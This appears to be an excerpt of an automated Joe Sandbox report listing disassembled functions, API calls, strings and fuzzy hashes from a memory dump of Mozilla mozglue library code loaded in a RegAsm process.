_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,6C0E42D2), ref: 6C0E4406

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: moz_xmalloc$_invalid_parameter_noinfo_noreturnfreemallocmemcpy
String ID:
API String ID: 2563754823-0
Opcode ID: 5961ebc945a5772b255cf96653a53f0dd39f83e29cd1ce7559055d883260b45a
Instruction ID: 6d6423b4813a521c9522c0736588d3bd6ee2234bbc636d707c89360b5f91a749
Opcode Fuzzy Hash: 5961ebc945a5772b255cf96653a53f0dd39f83e29cd1ce7559055d883260b45a
Instruction Fuzzy Hash: B9313B72A441159FD714DEF99C8076EB7E5EF88364B240F29E825DBB80E730ED048792

Function 6C14AD70 Relevance: 7.6, APIs: 5, Instructions: 93COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000000,?,00000000,?,?,6C15E330,?,6C10C059), ref: 6C14AD9D

Part of subcall function 6C0FCA10: malloc.MOZGLUE(?), ref: 6C0FCA26

memset.VCRUNTIME140(00000000,00000000,00000000,00000000,?,?,6C15E330,?,6C10C059), ref: 6C14ADAC
free.MOZGLUE(?,?,?,?,00000000,?,?,6C15E330,?,6C10C059), ref: 6C14AE01
GetLastError.KERNEL32(?,00000000,?,?,6C15E330,?,6C10C059), ref: 6C14AE1D
GetLastError.KERNEL32(?,00000000,00000000,00000000,?,?,?,00000000,?,?,6C15E330,?,6C10C059), ref: 6C14AE3D

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: ErrorLast$freemallocmemsetmoz_xmalloc
String ID:
API String ID: 3161513745-0
Opcode ID: d009f5e73290f9c26e308e047172b4358c56f84433cb3d39a1fd4960dec4141e
Instruction ID: 70d04fc6bd09f173340fecb426658337dd04137f4e8528177680752b6d2bffa1
Opcode Fuzzy Hash: d009f5e73290f9c26e308e047172b4358c56f84433cb3d39a1fd4960dec4141e
Instruction Fuzzy Hash: 813132B1A002159FDB10DF75CC44BABB7F8EF49614F558429E95AE7700E734E814CBA0

Function 6C140B90 Relevance: 7.6, APIs: 5, Instructions: 92timeCOMMON

Download Yara Rule

APIs

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C140BBC

Part of subcall function 6C105C50: GetTickCount64.KERNEL32 ref: 6C105D40
Part of subcall function 6C105C50: EnterCriticalSection.KERNEL32(6C16F688), ref: 6C105D67

?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C140BCA
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C140BD5

Part of subcall function 6C105C50: __aulldiv.LIBCMT ref: 6C105DB4
Part of subcall function 6C105C50: LeaveCriticalSection.KERNEL32(6C16F688), ref: 6C105DED

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C140BE2
?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6C140C9A

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: Time$StampV01@@Value@mozilla@@$CriticalSection$BaseCount64Creation@DurationEnterLeavePlatformProcessSeconds@Stamp@mozilla@@TickUtils@mozilla@@V12@__aulldiv
String ID:
API String ID: 3168180809-0
Opcode ID: 76cd11d1ec20ff811ad4de53f5828fba38a85f1f75a8966f0dfbc5da17c340d1
Instruction ID: 5522c44ed5a9c16dcc56816297b9a8538cdc81abefcae05f8e34df3a4417086f
Opcode Fuzzy Hash: 76cd11d1ec20ff811ad4de53f5828fba38a85f1f75a8966f0dfbc5da17c340d1
Instruction Fuzzy Hash: DE310471A047558BC714DF39889011BB7E8BF82774F118B1EF8A9A76D0EB7098488B92

Function 6C145EF0 Relevance: 7.6, APIs: 5, Instructions: 89COMMON

Download Yara Rule

APIs

?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE_N_N@Z.MSVCP140(00000001,00000000,6C15DCA0,?,?,?,6C11E8B5,00000000), ref: 6C145F1F
?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6C11E8B5,00000000), ref: 6C145F4B
?snextc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(00000000,?,6C11E8B5,00000000), ref: 6C145F7B
?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(6E65475B,00000000,?,6C11E8B5,00000000), ref: 6C145F9F
?sbumpc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6C11E8B5,00000000), ref: 6C145FD6

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: D@std@@@std@@U?$char_traits@$?clear@?$basic_ios@?sbumpc@?$basic_streambuf@?sgetc@?$basic_streambuf@?snextc@?$basic_streambuf@Ipfx@?$basic_istream@
String ID:
API String ID: 1389714915-0
Opcode ID: aaa5e2ea448cbaf96f95995d4883ef67b7864756a34f0ea712adaa08ce5553fb
Instruction ID: 655c1788de05dc5572e6e028751acd8f4f9017c5037dbd95687739ec771f4eaf
Opcode Fuzzy Hash: aaa5e2ea448cbaf96f95995d4883ef67b7864756a34f0ea712adaa08ce5553fb
Instruction Fuzzy Hash: DA314F343006008FD711CF29C898E2AB7F9FF99329B648598F9568BB95C735EC41DB91

Function 6C0EB4C0 Relevance: 7.6, APIs: 5, Instructions: 84COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 6C0EB532
moz_xmalloc.MOZGLUE(?), ref: 6C0EB55B
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C0EB56B
wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?), ref: 6C0EB57E
free.MOZGLUE(00000000), ref: 6C0EB58F

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: HandleModulefreememsetmoz_xmallocwcsncpy_s
String ID:
API String ID: 4244350000-0
Opcode ID: 240f7c24dcca6a3c937fbb97104c0f3cf4e04103db37dd3a9ce52d02d6f9f2d0
Instruction ID: b457c6057a9f3acf62c4d9c5e3082e9329920b400ebe2ca612b3e91acf7e0ae4
Opcode Fuzzy Hash: 240f7c24dcca6a3c937fbb97104c0f3cf4e04103db37dd3a9ce52d02d6f9f2d0
Instruction Fuzzy Hash: 3121B6726002059FDB008F65CC40BAABBF9FF46314F284129E925DB341E775D951C7A5

Function 6C0EB7A0 Relevance: 7.6, APIs: 5, Instructions: 77COMMON

Download Yara Rule

APIs

?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(?,?), ref: 6C0EB7CF
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 6C0EB808
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 6C0EB82C
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C0EB840
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C0EB849

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: free$?vprint@PrintfTarget@mozilla@@mallocmemcpy
String ID:
API String ID: 1977084945-0
Opcode ID: b6e5819dddf4e061ee24c70f0fedd7c1b77c39a499f873ec2f78b136bbc57ba2
Instruction ID: b9241a174b98299a5a881b8928a9e85554fa20498398c09e79cd39e67240bdec
Opcode Fuzzy Hash: b6e5819dddf4e061ee24c70f0fedd7c1b77c39a499f873ec2f78b136bbc57ba2
Instruction Fuzzy Hash: C42148B4E002099FDF04DFA9C8856BEBBF4EF49314F14812AEC45A7301E731A944CBA1

Function 6C146E50 Relevance: 7.6, APIs: 5, Instructions: 72COMMON

Download Yara Rule

APIs

MozDescribeCodeAddress.MOZGLUE(?,?), ref: 6C146E78

Part of subcall function 6C146A10: InitializeCriticalSection.KERNEL32(6C16F618), ref: 6C146A68
Part of subcall function 6C146A10: GetCurrentProcess.KERNEL32 ref: 6C146A7D
Part of subcall function 6C146A10: GetCurrentProcess.KERNEL32 ref: 6C146AA1
Part of subcall function 6C146A10: EnterCriticalSection.KERNEL32(6C16F618), ref: 6C146AAE
Part of subcall function 6C146A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C146AE1
Part of subcall function 6C146A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C146B15
Part of subcall function 6C146A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100,?,?), ref: 6C146B65
Part of subcall function 6C146A10: LeaveCriticalSection.KERNEL32(6C16F618,?,?), ref: 6C146B83

MozFormatCodeAddress.MOZGLUE ref: 6C146EC1
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C146EE1
_fileno.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C146EED
_write.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000400), ref: 6C146EFF

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: CriticalSectionstrncpy$AddressCodeCurrentProcess$DescribeEnterFormatInitializeLeave_fileno_writefflush
String ID:
API String ID: 4058739482-0
Opcode ID: 0e862ab470d156fc78e6a467b29ea626a4455de81492b42a57b92db4590d0e07
Instruction ID: a3583b8c384e637b1614485aab94e15ebbd7c5f51c62beb59b712bdee6068fcd
Opcode Fuzzy Hash: 0e862ab470d156fc78e6a467b29ea626a4455de81492b42a57b92db4590d0e07
Instruction Fuzzy Hash: D121A471A0421D9FDB00CF69D8856EA7BF5EF84308F048079E84997351DB749A59CF92

Function 6C1476C0 Relevance: 7.6, APIs: 5, Instructions: 64COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32 ref: 6C1476F2
moz_xmalloc.MOZGLUE(00000001), ref: 6C147705

Part of subcall function 6C0FCA10: malloc.MOZGLUE(?), ref: 6C0FCA26

memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C147717
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,6C14778F,00000000,00000000,00000000,00000000), ref: 6C147731
free.MOZGLUE(00000000), ref: 6C147760

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: ByteCharMultiWide$freemallocmemsetmoz_xmalloc
String ID:
API String ID: 2538299546-0
Opcode ID: 2bd71f307e41d328453648f15e133ae0010811bc75445f0fbabfde4751e5b72c
Instruction ID: c178e9d4cd329dc04c161cd2818be4cbf354e0957cc2449246bc810d4628ce3a
Opcode Fuzzy Hash: 2bd71f307e41d328453648f15e133ae0010811bc75445f0fbabfde4751e5b72c
Instruction Fuzzy Hash: 3E11C4B19012156BE710AF768C44BABBEF8EF45354F04452AF888E7300E7749844CBE2

Function 6C149B50 Relevance: 7.6, APIs: 5, Instructions: 53COMMON

Download Yara Rule

APIs

??KDecimal@blink@@QBE?AV01@ABV01@@Z.MOZGLUE(?,?), ref: 6C149B74
?ceil@Decimal@blink@@QBE?AV12@XZ.MOZGLUE ref: 6C149BBA
?floor@Decimal@blink@@QBE?AV12@XZ.MOZGLUE ref: 6C149BC8
??DDecimal@blink@@QBE?AV01@ABV01@@Z.MOZGLUE(?,?), ref: 6C149BD7
??GDecimal@blink@@QBE?AV01@ABV01@@Z.MOZGLUE(?,?,?,?), ref: 6C149BE0

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: Decimal@blink@@$V01@V01@@$V12@$?ceil@?floor@
String ID:
API String ID: 2380687156-0
Opcode ID: 70b9e999d61d9d94f254991004b4081cc13dc5c46e554888d1ab8acff5d07302
Instruction ID: a65b33a013b4d95cc3a6eb20cb367738c0745aeb49d8ccc3bf2b596785d4fce4
Opcode Fuzzy Hash: 70b9e999d61d9d94f254991004b4081cc13dc5c46e554888d1ab8acff5d07302
Instruction Fuzzy Hash: 07117371514344A78700DF688D50C9BB7BCFFC6264F04CA0DF99546640DB35D548C792

Function 6C120D60 Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,00000000,00008000,00003000,00003000,?,6C0E3DEF), ref: 6C120D71
VirtualAlloc.KERNEL32(?,08000000,00003000,00000004,?,6C0E3DEF), ref: 6C120D84
VirtualFree.KERNEL32(00000000,00000000,00008000,?,6C0E3DEF), ref: 6C120DAF

Strings

: (malloc) Error in VirtualFree(), xrefs: 6C120D97, 6C120DBE
<jemalloc>, xrefs: 6C120D92, 6C120DB9

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: Virtual$Free$Alloc
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 1852963964-2186867486
Opcode ID: 61f6af883ca8deb1278aabe7bd80bf596ce55abed98ed857d11f6c2606b0439f
Instruction ID: 207c972c1e7455fad979b36662bfa25cbe9821e81fdf6a335b4d8a9c29566a79
Opcode Fuzzy Hash: 61f6af883ca8deb1278aabe7bd80bf596ce55abed98ed857d11f6c2606b0439f
Instruction Fuzzy Hash: 7AF02E353D239C23E73411770C2AF6A266D6BC2B24F304275F204EEDC0DA9CE49156E4

Function 6C145850 Relevance: 7.5, APIs: 5, Instructions: 41synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(000000FF), ref: 6C14586C
CloseHandle.KERNEL32 ref: 6C145878
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C145898
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6C1458C9
free.MOZGLUE(00000000), ref: 6C1458D3

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: free$CloseHandleObjectSingleWait
String ID:
API String ID: 1910681409-0
Opcode ID: ed8c401651a4bbedacee2b4840ae46bc652e8f5b7f626fc0f3cd18b6d45ea0d4
Instruction ID: bc84250efe9780ad8ad73b7705b68a1354cac1faa04c2c9efd22ae25cdb73c0a
Opcode Fuzzy Hash: ed8c401651a4bbedacee2b4840ae46bc652e8f5b7f626fc0f3cd18b6d45ea0d4
Instruction Fuzzy Hash: 8B011975705202DBDF01DF6BDC08B267BB9FB933297248176E52AD2610EB319C25AF81

Function 6C137620 Relevance: 7.5, APIs: 5, Instructions: 35threadCOMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(0000002C,?,?,?,?,6C1375C4,?), ref: 6C13762B

Part of subcall function 6C0FCA10: malloc.MOZGLUE(?), ref: 6C0FCA26

InitializeConditionVariable.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,6C1374D7,6C1415FC,?,?,?), ref: 6C137644
GetCurrentThreadId.KERNEL32 ref: 6C13765A
AcquireSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6C1374D7,6C1415FC,?,?,?), ref: 6C137663
ReleaseSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6C1374D7,6C1415FC,?,?,?), ref: 6C137677

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireConditionCurrentInitializeReleaseThreadVariablemallocmoz_xmalloc
String ID:
API String ID: 418114769-0
Opcode ID: 796477a316691ba42dbb3b41ab73424dac1b16fb550b1ef5b93dab9b5141cb4c
Instruction ID: dd58cf927805cec20b1908fb71b450b00f10e1881a930c7e9f663eec77a407d7
Opcode Fuzzy Hash: 796477a316691ba42dbb3b41ab73424dac1b16fb550b1ef5b93dab9b5141cb4c
Instruction Fuzzy Hash: 00F0C271E10745ABD7008F22C888676B778FFEA259F114316F90447601E7B0B5D19BD0

Function 6C141700 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 190COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 6C141800

Part of subcall function 6C11CBE8: GetCurrentProcess.KERNEL32(?,6C0E31A7), ref: 6C11CBF1
Part of subcall function 6C11CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C0E31A7), ref: 6C11CBFA

Part of subcall function 6C0E4290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C123EBD,6C123EBD,00000000), ref: 6C0E42A9

Strings

{marker.name} - {marker.data.name}, xrefs: 6C1418C7
Details, xrefs: 6C141925
name, xrefs: 6C141939

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: Process$CurrentInit_thread_footerTerminatestrlen
String ID: Details$name${marker.name} - {marker.data.name}
API String ID: 46770647-1733325692
Opcode ID: a4d8d61aa5be81b8d76a8a961088dd91d90f2c506b8c6da72656ccc36ffd6bc2
Instruction ID: 15e803e30f093bdc155bb048a8e85bbe89174faec1462d43e2efbcd6de97e22d
Opcode Fuzzy Hash: a4d8d61aa5be81b8d76a8a961088dd91d90f2c506b8c6da72656ccc36ffd6bc2
Instruction Fuzzy Hash: C071F3B1A003469FC704DF69D4547AABBB1FF85304F50866DD8154BB41DB70EAA8CBE1

Function 6C14B0C0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 188COMMON

Download Yara Rule

APIs

free.MOZGLUE(?,?,6C14B0A6,6C14B0A6,?,6C14AF67,?,00000010,?,6C14AF67,?,00000010,00000000,?,?,6C14AB1F), ref: 6C14B1F2
?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,6C14B0A6,6C14B0A6,?,6C14AF67,?,00000010,?,6C14AF67,?,00000010,00000000,?), ref: 6C14B1FF
free.MOZGLUE(?,?,?,map/set<T> too long,?,?,6C14B0A6,6C14B0A6,?,6C14AF67,?,00000010,?,6C14AF67,?,00000010), ref: 6C14B25F

Strings

map/set<T> too long, xrefs: 6C14B1FA

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: free$Xlength_error@std@@
String ID: map/set<T> too long
API String ID: 1922495194-1285458680
Opcode ID: 11ab0c65280e8f71a75b68339fdc1bbcbbf702b4c661e48252db170a2e38531c
Instruction ID: e2dffa82b7e6eb792575808b0132fd9a2191c234cf1426d96e2619a3045a8131
Opcode Fuzzy Hash: 11ab0c65280e8f71a75b68339fdc1bbcbbf702b4c661e48252db170a2e38531c
Instruction Fuzzy Hash: 6461A774604645CFD701CF19D884A9ABBF2FF5A718F28C1A9D8598BB12C335EC45CBA1

Function 6C10D468 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 146COMMON

Download Yara Rule

APIs

Part of subcall function 6C11CBE8: GetCurrentProcess.KERNEL32(?,6C0E31A7), ref: 6C11CBF1
Part of subcall function 6C11CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C0E31A7), ref: 6C11CBFA

EnterCriticalSection.KERNEL32(6C16E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C11D1C5), ref: 6C10D4F2
LeaveCriticalSection.KERNEL32(6C16E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C11D1C5), ref: 6C10D50B

Part of subcall function 6C0ECFE0: EnterCriticalSection.KERNEL32(6C16E784), ref: 6C0ECFF6
Part of subcall function 6C0ECFE0: LeaveCriticalSection.KERNEL32(6C16E784), ref: 6C0ED026

InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C11D1C5), ref: 6C10D52E
EnterCriticalSection.KERNEL32(6C16E7DC), ref: 6C10D690
LeaveCriticalSection.KERNEL32(6C16E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C11D1C5), ref: 6C10D751

Strings

MOZ_CRASH(), xrefs: 6C10D4BB

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Process$CountCurrentInitializeSpinTerminate
String ID: MOZ_CRASH()
API String ID: 3805649505-2608361144
Opcode ID: 6f4c0b275419399a84954bb7bc652da7dbfa21c87265e51360b3479f8306d31f
Instruction ID: ab222f4c35cb96a1a7dbf79e459f3fa7b683534772ab0449fde8022b2aa81c60
Opcode Fuzzy Hash: 6f4c0b275419399a84954bb7bc652da7dbfa21c87265e51360b3479f8306d31f
Instruction Fuzzy Hash: E551CF71B087018FD324DF29C59472AB7E5EB89344F158A2EE6A9C7F84DB74E810CB91

Function 6C134630 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6C134721

Strings

profiler-paused, xrefs: 6C1346E4
., xrefs: 6C13476A
-%llu, xrefs: 6C134733

Memory Dump Source

